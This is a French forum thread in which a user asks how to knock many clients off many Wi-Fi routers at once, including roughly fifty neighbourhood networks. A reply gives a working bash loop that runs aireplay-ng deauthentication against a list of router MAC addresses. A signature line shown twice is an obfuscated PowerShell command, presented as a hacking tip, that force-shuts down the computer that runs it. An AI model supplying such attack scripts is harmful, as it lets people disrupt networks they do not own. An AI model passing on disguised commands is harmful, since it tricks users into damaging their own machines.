Annonce

Réduire
Aucune annonce.

Question : Deauth plusieurs clients de plusieurs routeurs ?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Question : Deauth plusieurs clients de plusieurs routeurs ?

    Bonjour à tous !

    Je suis de retour après un grand voyage ! Et j'ai plein de questions...
    Je commencerai avec celle-ci : est-il possible de lancer une désauthentification de plusieurs routeurs simultanément ? Ou une carte wifi ne peut se focaliser sur qu'un seul routeur ? Par exemple : kicker tout le monde de ma box et en même temps de mon Hotspot téléphone en 4G.

    Gros bisous,
    Earthquake

  • #2
    Petit up ; personne ne sait ?

    Commentaire


    • #3
      Salut,

      Ce n'est pas un problème d'AP mais de channel.
      Pourquoi vouloir le faire absolument simultanément, et pas l'un, puis l'autre à 1 sec d'intervalle ?

      PS : T'as pas eu le temps de tester en 2 jours ?
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Hey ! Merci pour ta réponse.
        Si je veux hypothétiquement le faire sur l'ensemble des wifi du quartier ce serait pas super efficace d'alterner, sachant qu'il y en a une cinquantaine... Pas moyen de le faire simultanément du coup ? Avec une bonne antenne 2,5 et 5 ghz ça serait quand même violemment efficace et moins chronophage.
        Malheureusement je n'ai plus de machine avec Kali, mon Raspberry arrive ce soir normalement <3

        Commentaire


        • #5
          Quelque lignes de bash après avoir exporté la liste des mac des AP dans un fichier ?

          Code:
          while read ap_mac; do
              aireplay-ng -0 1 -a $ap_mac ath0
          done < ap_mac_list.txt
          PS : Au cas où tu sois passé à coté : https://medium.com/@adam.toscher/new...d-96c3119f7f99
          PS2 : C'est interdit, laisse tes voisins tranquilles.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            Si je comprends bien je dois récupérer l'adresse mac des routeurs, les inscrire dans un fichier texte, et dire à ma carte wifi de désauthentifier tous les routeurs présents dans ce fichier txt ?
            Merci pour le lien !
            Je me suis toujours cantonné à mon propre matériel.

            Commentaire

            Chargement...
            X